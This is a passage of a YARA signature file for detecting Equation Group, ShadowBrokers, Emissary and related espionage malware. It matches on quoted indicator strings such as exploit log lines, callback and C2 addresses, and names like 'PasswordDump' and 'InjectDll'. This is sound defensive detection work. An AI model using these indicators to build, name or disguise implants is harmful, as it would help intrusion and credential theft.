    $s4 = "Send_Packet: Trying to send too much data." ascii fullword
    $s5 = "payloadLength >= MAX_ALLOW_SIZE." ascii fullword
    $s6 = "Wrong Payload Size" ascii fullword
    $s7 = "Unknown packet received......" ascii fullword
    $s8 = "Returned eax = %08x" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 6144000 and (2 of ($s*))) or (5 of them)
}

rule EQGRP_eligiblebombshell_generic {
  meta:
    description = "EQGRP Toolset Firewall - from files eligiblebombshell_1.2.0.1.py, eligiblebombshell_1.2.0.1.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1"
    hash2 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1"
  strings:
    $s1 = "logging.error(\"       Perhaps you should run with --scan?\")" ascii fullword
    $s2 = "logging.error(\"ERROR: No entry for ETag [%s] in %s.\" %" ascii fullword
    $s3 = "\"be supplied\")" ascii fullword
  condition:
    (filesize < 71680 and 2 of ($s*)) or (all of them)
}

rule EQGRP_ssh_telnet_29 {
  meta:
    description = "EQGRP Toolset Firewall - from files ssh.py, telnet.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "630d464b1d08c4dfd0bd50552bee2d6a591fb0b5597ecebaa556a3c3d4e0aa4e"
    hash2 = "07f4c60505f4d5fb5c4a76a8c899d9b63291444a3980d94c06e1d5889ae85482"
  strings:
    $s1 = "received prompt, we're in" ascii fullword
    $s2 = "failed to login, bad creds, abort" ascii fullword
    $s3 = "sending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + " ascii fullword
    $s4 = "received nat - EPBA: ok, payload: mangled, did not run" ascii fullword
    $s5 = "no status returned from target, could be an exploit failure, or this is a version where we don't expect a stus return" ascii
    $s6 = "received arp - EPBA: ok, payload: fail" ascii fullword
    $s7 = "chopped = string.rstrip(payload, \"\\x0a\")" ascii fullword
  condition:
    (filesize < 10240 and 2 of them) or (3 of them)
}

rule EQGRP_tinyexec {
  meta:
    description = "EQGRP Toolset Firewall - from files tinyexec"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
  strings:
    $s1 = { 73 68 73 74 72 74 61 62 00 2E 74 65 78 74 }
    $s2 = { 5A 58 55 52 89 E2 55 50 89 E1 }
  condition:
    uint32(0) == 1179403647 and filesize < 270 and all of them
}

rule EQGRP_callbacks {
  meta:
    description = "EQGRP Toolset Firewall - Callback addresses"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
  strings:
    $s1 = "30.40.50.60:9342" ascii wide fullword
  condition:
    1 of them
}

rule EQGRP_Extrabacon_Output {
  meta:
    description = "EQGRP Toolset Firewall - Extrabacon exploit output"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
  strings:
    $s1 = "|###[ SNMPresponse ]###" ascii fullword
    $s2 = "[+] generating exploit for exec mode pass-disable" ascii fullword
    $s3 = "[+] building payload for mode pass-disable" ascii fullword
    $s4 = "[+] Executing:  extrabacon" ascii fullword
    $s5 = "appended AAAADMINAUTH_ENABLE payload" ascii fullword
  condition:
    2 of them
}

rule EQGRP_Unique_Strings {
  meta:
    description = "EQGRP Toolset Firewall - Unique strings"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
  strings:
    $s1 = "/BananaGlee/ELIGIBLEBOMB" ascii
    $s2 = "Protocol must be either http or https (Ex: https://1.2.3.4:1234)"
  condition:
    1 of them
}

rule EQGRP_RC5_RC6_Opcode {
  meta:
    description = "EQGRP Toolset Firewall - RC5 / RC6 opcode"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/incidents/75812/the-equation-giveaway/"
    date = "2016-08-17"
  strings:
    $s1 = { 8B 74 91 FC 81 EE 47 86 C8 61 89 34 91 42 83 FA 2B }
  condition:
    1 of them
}

rule Emissary_APT_Malware_1 {
  meta:
    description = "Detect Emissary Malware - from samples A08E81B411.DAT, ishelp.dll"
    author = "Florian Roth"
    reference = "http://goo.gl/V0epcf"
    date = "2016-01-02"
    score = 75
    hash1 = "9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab"
    hash2 = "70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629"
    hash3 = "0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290"
    hash4 = "69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664"
    hash5 = "675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc"
    hash6 = "e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b"
    hash7 = "a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8"
    hash8 = "acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9"
    hash9 = "e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d"
    hash10 = "e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538"
    hash11 = "29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051"
    hash12 = "98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0"
    hash13 = "fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb"
  strings:
    $s1 = "cmd.exe /c %s > %s" ascii fullword
    $s2 = "execute cmd timeout." ascii fullword
    $s3 = "rundll32.exe \"%s\",Setting" ascii fullword
    $s4 = "DownloadFile - exception:%s." ascii fullword
    $s5 = "CDllApp::InitInstance() - Evnet create successful." ascii fullword
    $s6 = "UploadFile - EncryptBuffer Error" ascii fullword
    $s7 = "WinDLL.dll" wide fullword
    $s8 = "DownloadFile - exception:%s,code:0x%08x." ascii fullword
    $s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" ascii fullword
    $s10 = "CDllApp::InitInstance() - Evnet already exists." ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 256000 and 3 of them
}

rule Backdoored_ssh {
  meta:
    author = "Kaspersky"
    reference = "https://securelist.com/energetic-bear-crouching-yeti/85345/"
    actor = "Energetic Bear/Crouching Yeti"
  strings:
    $a1 = "OpenSSH"
    $a2 = "usage: ssh"
    $a3 = "HISTFILE"
  condition:
    uint32(0) == 1179403647 and filesize < 1000000 and all of ($a*)
}

rule apt_equation_exploitlib_mutexes {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW"
    version = "1.0"
    last_modified = "2015-02-16"
    reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
  strings:
    $mz = "MZ"
    $a1 = "prkMtx" wide
    $a2 = "cnFormSyncExFBC" wide
    $a3 = "cnFormVoidFBC" wide
    $a4 = "cnFormSyncExFBC"
    $a5 = "cnFormVoidFBC"
  condition:
    (($mz at 0) and any of ($a*))
}

rule apt_equation_doublefantasy_genericresource {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect DoubleFantasy encoded config http://goo.gl/ivt8EW"
    version = "1.0"
    last_modified = "2015-02-16"
    reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
  strings:
    $mz = "MZ"
    $a1 = { 06 00 42 00 49 00 4E 00 52 00 45 00 53 00 }
    $a2 = "yyyyyyyyyyyyyyyy"
    $a3 = "002"
  condition:
    (($mz at 0) and all of ($a*)) and filesize < 500000
}

rule apt_equation_equationlaser_runtimeclasses {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect the EquationLaser malware"
    version = "1.0"
    last_modified = "2015-02-16"
    reference = "https://securelist.com/blog/"
  strings:
    $a1 = "?a73957838_2@@YAXXZ"
    $a2 = "?a84884@@YAXXZ"
    $a3 = "?b823838_9839@@YAXXZ"
    $a4 = "?e747383_94@@YAXXZ"
    $a5 = "?e83834@@YAXXZ"
    $a6 = "?e929348_827@@YAXXZ"
  condition:
    any of them
}

rule apt_equation_cryptotable {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect the crypto library used in Equation group malware"
    version = "1.0"
    last_modified = "2015-02-16"
    reference = "https://securelist.com/blog/"
  strings:
    $a = { 37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 17 14 4F 03 74 1E 41 DA 8F 7D DE 7E 99 F1 35 AC B8 46 93 CE 23 82 07 EB 2B D4 72 71 40 F3 B0 F7 78 D7 4C D1 55 1A 39 83 18 FA E1 9A 56 B1 96 AB A6 30 C5 5F BE 0C 50 C1 }
  condition:
    $a
}

rule Equation_Kaspersky_TripleFantasy_1 {
  meta:
    description = "Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW"
    author = "Florian Roth"
    reference = "http://goo.gl/ivt8EW"
    date = "2015/02/16"
    hash = "b2b2cd9ca6f5864ef2ac6382b7b6374a9fb2cbe9"
  strings:
    $mz = { 4D 5A }
    $s0 = "%SystemRoot%\\system32\\hnetcfg.dll" wide fullword
    $s1 = "%WINDIR%\\System32\\ahlhcib.dll" wide fullword
    $s2 = "%WINDIR%\\sjyntmv.dat" wide fullword
    $s3 = "Global\\{8c38e4f3-591f-91cf-06a6-67b84d8a0102}" wide fullword
    $s4 = "%WINDIR%\\System32\\owrwbsdi" wide fullword
    $s5 = "Chrome" wide fullword
    $s6 = "StringIndex" ascii fullword
    $x1 = "itemagic.net@443" wide fullword
    $x2 = "team4heat.net@443" wide fullword
    $x5 = "62.216.152.69@443" wide fullword
    $x6 = "84.233.205.37@443" wide fullword
    $z1 = "www.microsoft.com@80" wide fullword
    $z2 = "www.google.com@80" wide fullword
    $z3 = "127.0.0.1:3128" wide fullword
  condition:
    ($mz at 0) and filesize < 300000 and ((all of ($s*) and all of ($z*)) or (all of ($s*) and 1 of ($x*)))
}

rule Equation_Kaspersky_DoubleFantasy_1 {
  meta:
    description = "Equation Group Malware - DoubleFantasy"
    author = "Florian Roth"
    reference = "http://goo.gl/ivt8EW"
    date = "2015/02/16"
    hash = "d09b4b6d3244ac382049736ca98d7de0c6787fa2"
  strings:
    $mz = { 4D 5A }
    $z1 = "msvcp5%d.dll" ascii fullword
    $s0 = "actxprxy.GetProxyDllInfo" ascii fullword
    $s3 = "actxprxy.DllGetClassObject" ascii fullword
    $s5 = "actxprxy.DllRegisterServer" ascii fullword
    $s6 = "actxprxy.DllUnregisterServer" ascii fullword
    $x1 = "yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy" ascii
    $x2 = "191H1a1" ascii fullword
    $x3 = "November " ascii fullword
    $x4 = "abababababab" ascii fullword
    $x5 = "January " ascii fullword
    $x6 = "October " ascii fullword
    $x7 = "September " ascii fullword
  condition:
    ($mz at 0) and filesize < 350000 and (($z1) or (all of ($s*) and 6 of ($x*)))
}

rule Equation_Kaspersky_GROK_Keylogger {
  meta:
    description = "Equation Group Malware - GROK keylogger"
    author = "Florian Roth"
    reference = "http://goo.gl/ivt8EW"
    date = "2015/02/16"
    hash = "50b8f125ed33233a545a1aac3c9d4bb6aa34b48f"
  strings:
    $mz = { 4D 5A }
    $s0 = "c:\\users\\rmgree5\\" ascii
    $s1 = "msrtdv.sys" wide fullword
    $x1 = "svrg.pdb" ascii fullword
    $x2 = "W32pServiceTable" ascii fullword
    $x3 = "In forma" ascii fullword
    $x4 = "ReleaseF" ascii fullword
    $x5 = "criptor" ascii fullword
    $x6 = "astMutex" ascii fullword
    $x7 = "ARASATAU" ascii fullword
    $x8 = "R0omp4ar" ascii fullword
    $z1 = "H.text" ascii fullword
    $z2 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" wide fullword
    $z4 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\Environment" wide fullword
  condition:
    ($mz at 0) and filesize < 250000 and ($s0 or ($s1 and 6 of ($x*)) or (6 of ($x*) and all of ($z*)))
}

rule Equation_Kaspersky_GreyFishInstaller {
  meta:
    description = "Equation Group Malware - Grey Fish"
    author = "Florian Roth"
    reference = "http://goo.gl/ivt8EW"
    date = "2015/02/16"
    hash = "58d15d1581f32f36542f3e9fb4b1fc84d2a6ba35"
  strings:
    $s0 = "DOGROUND.exe" wide fullword
    $s1 = "Windows Configuration Services" wide fullword
    $s2 = "GetMappedFilenameW" ascii fullword
  condition:
    all of them
}

rule Equation_Kaspersky_EquationDrugInstaller {
  meta:
    description = "Equation Group Malware - EquationDrug installer LUTEUSOBSTOS"
    author = "Florian Roth"
    reference = "http://goo.gl/ivt8EW"
    date = "2015/02/16"
    hash = "61fab1b8451275c7fd580895d9c68e152ff46417"
  strings:
    $mz = { 4D 5A }
    $s0 = "\\system32\\win32k.sys" wide fullword
    $s1 = "ALL_FIREWALLS" ascii fullword
    $x1 = "@prkMtx" wide fullword
    $x2 = "STATIC" wide fullword
    $x3 = "windir" wide fullword
    $x4 = "cnFormVoidFBC" wide fullword
    $x5 = "CcnFormSyncExFBC" wide fullword
    $x6 = "WinStaObj" wide fullword
    $x7 = "BINRES" wide fullword
  condition:
    ($mz at 0) and filesize < 500000 and all of ($s*) and 5 of ($x*)
}

rule Equation_Kaspersky_EquationLaserInstaller {
  meta:
    description = "Equation Group Malware - EquationLaser Installer"
    author = "Florian Roth"
    reference = "http://goo.gl/ivt8EW"
    date = "2015/02/16"
    hash = "5e1f56c1e57fbff96d4999db1fd6dd0f7d8221df"
  strings:
    $mz = { 4D 5A }
    $s0 = "Failed to get Windows version" ascii fullword
    $s1 = "lsasrv32.dll and lsass.exe" wide fullword
    $s2 = "\\\\%s\\mailslot\\%s" ascii fullword
    $s3 = "%d-%d-%d %d:%d:%d Z" ascii fullword
    $s4 = "lsasrv32.dll" ascii fullword
    $s5 = "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" ascii fullword
    $s6 = "%s %02x %s" ascii fullword
    $s7 = "VIEWERS" ascii fullword
    $s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" wide fullword
  condition:
    ($mz at 0) and filesize < 250000 and 6 of ($s*)
}

rule Equation_Kaspersky_FannyWorm {
  meta:
    description = "Equation Group Malware - Fanny Worm"
    author = "Florian Roth"
    reference = "http://goo.gl/ivt8EW"
    date = "2015/02/16"
    hash = "1f0ae54ac3f10d533013f74f48849de4e65817a7"
  strings:
    $mz = { 4D 5A }
    $s1 = "x:\\fanny.bmp" ascii fullword
    $s2 = "32.exe" ascii fullword
    $s3 = "d:\\fanny.bmp" ascii fullword
    $x1 = "c:\\windows\\system32\\kernel32.dll" ascii fullword
    $x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" ascii fullword
    $x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" ascii fullword
    $x4 = "\\system32\\win32k.sys" wide fullword
    $x5 = "\\AGENTCPD.DLL" ascii fullword
    $x6 = "agentcpd.dll" ascii fullword
    $x7 = "PADupdate.exe" ascii fullword
    $x8 = "dll_installer.dll" ascii fullword
    $x9 = "\\restore\\" ascii fullword
    $x10 = "Q:\\__?__.lnk" ascii fullword
    $x11 = "Software\\Microsoft\\MSNetMng" ascii fullword
    $x12 = "\\shelldoc.dll" ascii fullword
    $x13 = "file size = %d bytes" ascii fullword
    $x14 = "\\MSAgent" ascii fullword
    $x15 = "Global\\RPCMutex" ascii fullword
    $x16 = "Global\\DirectMarketing" ascii fullword
  condition:
    ($mz at 0) and filesize < 300000 and ((2 of ($s*)) or (1 of ($s*) and 6 of ($x*)) or (14 of ($x*)))
}

rule Equation_Kaspersky_HDD_reprogramming_module {
  meta:
    description = "Equation Group Malware - HDD reprogramming module"
    author = "Florian Roth"
    reference = "http://goo.gl/ivt8EW"
    date = "2015/02/16"
    hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
  strings:
    $mz = { 4D 5A }
    $s0 = "nls_933w.dll" ascii fullword
    $s1 = "BINARY" wide fullword
    $s2 = "KfAcquireSpinLock" ascii fullword
    $s3 = "HAL.dll" ascii fullword
    $s4 = "READ_REGISTER_UCHAR" ascii fullword
  condition:
    ($mz at 0) and filesize < 300000 and all of ($s*)
}

rule Equation_Kaspersky_EOP_Package {
  meta:
    description = "Equation Group Malware - EoP package and malware launcher"
    author = "Florian Roth"
    reference = "http://goo.gl/ivt8EW"
    date = "2015/02/16"
    hash = "2bd1b1f5b4384ce802d5d32d8c8fd3d1dc04b962"
  strings:
    $mz = { 4D 5A }
    $s0 = "abababababab" ascii fullword
    $s1 = "abcdefghijklmnopq" ascii fullword
    $s2 = "@STATIC" wide fullword
    $s3 = "$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" ascii fullword
    $s4 = "@prkMtx" wide fullword
    $s5 = "prkMtx" wide fullword
    $s6 = "cnFormVoidFBC" wide fullword
  condition:
    ($mz at 0) and filesize < 100000 and all of ($s*)
}

rule Equation_Kaspersky_TripleFantasy_Loader {
  meta:
    description = "Equation Group Malware - TripleFantasy Loader"
    author = "Florian Roth"
    reference = "http://goo.gl/ivt8EW"
    date = "2015/02/16"
    hash = "4ce6e77a11b443cc7cbe439b71bf39a39d3d7fa3"
  strings:
    $mz = { 4D 5A }
    $x1 = "Original Innovations, LLC" wide fullword
    $x2 = "Moniter Resource Protocol" wide fullword
    $x3 = "ahlhcib.dll" wide fullword
    $s0 = "hnetcfg.HNetGetSharingServicesPage" ascii fullword
    $s1 = "hnetcfg.IcfGetOperationalMode" ascii fullword
    $s2 = "hnetcfg.IcfGetDynamicFwPorts" ascii fullword
    $s3 = "hnetcfg.HNetFreeFirewallLoggingSettings" ascii fullword
    $s4 = "hnetcfg.HNetGetShareAndBridgeSettings" ascii fullword
    $s5 = "hnetcfg.HNetGetFirewallSettingsPage" ascii fullword
  condition:
    ($mz at 0) and filesize < 50000 and (all of ($x*) and all of ($s*))
}

rule Equation_Kaspersky_SuspiciousString {
  meta:
    description = "Equation Group Malware - suspicious string found in sample"
    author = "Florian Roth"
    reference = "http://goo.gl/ivt8EW"
    date = "2015/02/17"
    score = 60
  strings:
    $mz = { 4D 5A }
    $s1 = "i386\\DesertWinterDriver.pdb" fullword
    $s2 = "Performing UR-specific post-install..."
    $s3 = "Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!"
    $s4 = "STRAITSHOOTER30.exe"
    $s5 = "standalonegrok_2.1.1.1"
    $s6 = "c:\\users\\rmgree5\\"
  condition:
    ($mz at 0) and filesize < 500000 and all of ($s*)
}

rule EquationDrug_NetworkSniffer1 {
  meta:
    description = "EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys"
    author = "Florian Roth @4nc4p"
    reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
    date = "2015/03/11"
    hash = "26e787997a338d8111d96c9a4c103cf8ff0201ce"
  strings:
    $s0 = "Microsoft(R) Windows (TM) Operating System" wide fullword
    $s1 = "\\Registry\\User\\CurrentUser\\" wide fullword
    $s3 = "sys\\mstcp32.dbg" ascii fullword
    $s7 = "mstcp32.sys" wide fullword
    $s8 = "p32.sys" ascii fullword
    $s9 = "\\Device\\%ws_%ws" wide fullword
    $s10 = "\\DosDevices\\%ws" wide fullword
    $s11 = "\\Device\\%ws" wide fullword
  condition:
    all of them
}

rule EquationDrug_CompatLayer_UnilayDLL {
  meta:
    description = "EquationDrug - Unilay.DLL"
    author = "Florian Roth @4nc4p"
    reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
    date = "2015/03/11"
    hash = "a3a31937956f161beba8acac35b96cb74241cd0f"
  strings:
    $mz = { 4D 5A }
    $s0 = "unilay.dll" ascii fullword
  condition:
    ($mz at 0) and $s0
}

rule EquationDrug_HDDSSD_Op {
  meta:
    description = "EquationDrug - HDD/SSD firmware operation - nls_933w.dll"
    author = "Florian Roth @4nc4p"
    reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
    date = "2015/03/11"
    hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
  strings:
    $s0 = "nls_933w.dll" ascii fullword
  condition:
    all of them
}

rule EquationDrug_NetworkSniffer2 {
  meta:
    description = "EquationDrug - Network Sniffer - tdip.sys"
    author = "Florian Roth @4nc4p"
    reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
    date = "2015/03/11"
    hash = "7e3cd36875c0e5ccb076eb74855d627ae8d4627f"
  strings:
    $s0 = "Microsoft(R) Windows (TM) Operating System" wide fullword
    $s1 = "IP Transport Driver" wide fullword
    $s2 = "tdip.sys" wide fullword
    $s3 = "sys\\tdip.dbg" ascii fullword
    $s4 = "dip.sys" ascii fullword
    $s5 = "\\Device\\%ws_%ws" wide fullword
    $s6 = "\\DosDevices\\%ws" wide fullword
    $s7 = "\\Device\\%ws" wide fullword
  condition:
    all of them
}

rule EquationDrug_NetworkSniffer3 {
  meta:
    description = "EquationDrug - Network Sniffer - tdip.sys"
    author = "Florian Roth @4nc4p"
    reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
    date = "2015/03/11"
    hash = "14599516381a9646cd978cf962c4f92386371040"
  strings:
    $s0 = "Corporation. All rights reserved." wide fullword
    $s1 = "IP Transport Driver" wide fullword
    $s2 = "tdip.sys" wide fullword
    $s3 = "tdip.pdb" ascii fullword
  condition:
    all of them
}

rule EquationDrug_VolRec_Driver {
  meta:
    description = "EquationDrug - Collector plugin for Volrec - msrstd.sys"
    author = "Florian Roth @4nc4p"
    reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
    date = "2015/03/11"
    hash = "ee2b504ad502dc3fed62d6483d93d9b1221cdd6c"
  strings:
    $s0 = "msrstd.sys" wide fullword
    $s1 = "msrstd.pdb" ascii fullword
    $s2 = "msrstd driver" wide fullword
  condition:
    all of them
}

rule EquationDrug_KernelRootkit {
  meta:
    description = "EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys"
    author = "Florian Roth @4nc4p"
    reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
    date = "2015/03/11"
    hash = "597715224249e9fb77dc733b2e4d507f0cc41af6"
  strings:
    $s0 = "Microsoft(R) Windows (TM) Operating System" wide fullword
    $s1 = "Parmsndsrv.dbg" ascii fullword
    $s2 = "\\Registry\\User\\CurrentUser\\" wide fullword
    $s3 = "msndsrv.sys" wide fullword
    $s5 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Control\\Windows" wide fullword
    $s6 = "\\Device\\%ws_%ws" wide fullword
    $s7 = "\\DosDevices\\%ws" wide fullword
    $s9 = "\\Device\\%ws" wide fullword
  condition:
    all of them
}

rule EquationDrug_Keylogger {
  meta:
    description = "EquationDrug - Key/clipboard logger driver - msrtvd.sys"
    author = "Florian Roth @4nc4p"
    reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
    date = "2015/03/11"
    hash = "b93aa17b19575a6e4962d224c5801fb78e9a7bb5"
  strings:
    $s0 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" wide fullword
    $s2 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\En" wide
    $s3 = "\\DosDevices\\Gk" wide fullword
    $s5 = "\\Device\\Gk0" wide fullword
  condition:
    all of them
}

rule EquationDrug_NetworkSniffer4 {
  meta:
    description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
    author = "Florian Roth @4nc4p"
    reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
    date = "2015/03/11"
    hash = "cace40965f8600a24a2457f7792efba3bd84d9ba"
  strings:
    $s0 = "Copyright 1999 RAVISENT Technologies Inc." wide fullword
    $s1 = "\\systemroot\\" ascii fullword
    $s2 = "RAVISENT Technologies Inc." wide fullword
    $s3 = "Created by VIONA Development" wide fullword
    $s4 = "\\Registry\\User\\CurrentUser\\" wide fullword
    $s5 = "\\device\\harddiskvolume" wide fullword
    $s7 = "ATMDKDRV.SYS" wide fullword
    $s8 = "\\Device\\%ws_%ws" wide fullword
    $s9 = "\\DosDevices\\%ws" wide fullword
    $s10 = "CineMaster C 1.1 WDM Main Driver" wide fullword
    $s11 = "\\Device\\%ws" wide fullword
    $s13 = "CineMaster C 1.1 WDM" wide fullword
  condition:
    all of them
}

rule EquationDrug_PlatformOrchestrator {
  meta:
    description = "EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll"
    author = "Florian Roth @4nc4p"
    reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
    date = "2015/03/11"
    hash = "febc4f30786db7804008dc9bc1cebdc26993e240"
  strings:
    $s0 = "SERVICES.EXE" wide fullword
    $s1 = "\\command.com" wide fullword
    $s2 = "Microsoft(R) Windows (TM) Operating System" wide fullword
    $s3 = "LSASS.EXE" wide fullword
    $s4 = "Windows Configuration Services" wide fullword
    $s8 = "unilay.dll" ascii fullword
  condition:
    all of them
}

rule EquationDrug_NetworkSniffer5 {
  meta:
    description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
    author = "Florian Roth @4nc4p"
    reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
    date = "2015/03/11"
    hash = "09399b9bd600d4516db37307a457bc55eedcbd17"
  strings:
    $s0 = "Microsoft(R) Windows (TM) Operating System" wide fullword
    $s1 = "\\Registry\\User\\CurrentUser\\" wide fullword
    $s2 = "atmdkdrv.sys" wide fullword
    $s4 = "\\Device\\%ws_%ws" wide fullword
    $s5 = "\\DosDevices\\%ws" wide fullword
    $s6 = "\\Device\\%ws" wide fullword
  condition:
    all of them
}

rule EquationDrug_FileSystem_Filter {
  meta:
    description = "EquationDrug - Filesystem filter driver – volrec.sys, scsi2mgr.sys"
    author = "Florian Roth @4nc4p"
    reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
    date = "2015/03/11"
    hash = "57fa4a1abbf39f4899ea76543ebd3688dcc11e13"
  strings:
    $s0 = "volrec.sys" wide fullword
    $s1 = "volrec.pdb" ascii fullword
    $s2 = "Volume recognizer driver" wide fullword
  condition:
    all of them
}

rule apt_equation_keyword {
  meta:
    description = "Rule to detect Equation group's keyword in executable file"
    author = "Florian Roth @4nc4p"
    last_modified = "2015-09-26"
    reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
  strings:
    $a1 = "Backsnarf_AB25" wide
    $a2 = "Backsnarf_AB25" ascii
  condition:
    uint16(0) == 23117 and 1 of ($a*)
}

rule FVEY_ShadowBrokers_Jan17_Screen_Strings {
  meta:
    description = "Detects strings derived from the ShadowBroker's leak of Windows tools/exploits"
    author = "Florian Roth"
    reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message7/"
    date = "2017-01-08"
  strings:
    $x1 = "Danderspritz" ascii wide fullword
    $x2 = "DanderSpritz" ascii wide fullword
    $x3 = "PeddleCheap" ascii wide fullword
    $x4 = "ChimneyPool Addres" ascii wide fullword
    $a1 = "Getting remote time" ascii fullword
    $a2 = "RETRIEVED" ascii fullword
    $b1 = "Added Ops library to Python search path" ascii fullword
    $b2 = "target: z0.0.0.1" ascii fullword
    $c1 = "Psp_Avoidance" ascii fullword
    $c2 = "PasswordDump" ascii fullword
    $c3 = "InjectDll" ascii fullword
    $c4 = "EventLogEdit" ascii fullword
    $c5 = "ProcessModify" ascii fullword
    $d1 = "Mcl_NtElevation" ascii wide fullword
    $d2 = "Mcl_NtNativeApi" ascii wide fullword
    $d3 = "Mcl_ThreatInject" ascii wide fullword
    $d4 = "Mcl_NtMemory" ascii wide fullword
  condition:
    filesize < 2048000 and (1 of ($x*) or all of ($a*) or 1 of ($b*) or (uint16(0) == 23117 and 1 of ($c*)) or 3 of ($c*) or (uint16(0) == 23117 and 3 of ($d*)))
}

rule FiveEyes_QUERTY_Malwareqwerty_20121 {
  meta:
    description = "FiveEyes QUERTY Malware - file 20121.xml"
    author = "Florian Roth"
    reference = "http://www.spiegel.de/media/media-35668.pdf"
    date = "2015/01/18"
    hash = "8263fb58350f3b1d3c4220a602421232d5e40726"
  strings:
    $s0 = "<configFileName>20121_cmdDef.xml</configFileName>" ascii fullword
    $s1 = "<name>20121.dll</name>" ascii fullword
    $s2 = "<codebase>\"Reserved for future use.\"</codebase>" ascii fullword
    $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
    $s4 = "<platform type=\"1\">" ascii fullword
    $s5 = "</plugin>" ascii fullword
    $s6 = "</pluginConfig>" ascii fullword
    $s7 = "<pluginConfig>" ascii fullword
    $s8 = "</platform>" ascii fullword
    $s9 = "</lpConfig>" ascii fullword
    $s10 = "<lpConfig>" ascii fullword
  condition:
    9 of them
}

rule FiveEyes_QUERTY_Malwaresig_20123_sys {
  meta:
    description = "FiveEyes QUERTY Malware - file 20123.sys.bin"
    author = "Florian Roth"
    reference = "http://www.spiegel.de/media/media-35668.pdf"
    date = "2015/01/18"
    hash = "a0f0087bd1f8234d5e847363d7e15be8a3e6f099"
  strings:
    $s0 = "20123.dll" ascii fullword
    $s1 = "kbdclass.sys" wide fullword
    $s2 = "IoFreeMdl" ascii fullword
    $s3 = "ntoskrnl.exe" ascii fullword
    $s4 = "KfReleaseSpinLock" ascii fullword
  condition:
    all of them
}

rule FiveEyes_QUERTY_Malwaresig_20123_cmdDef {
  meta:
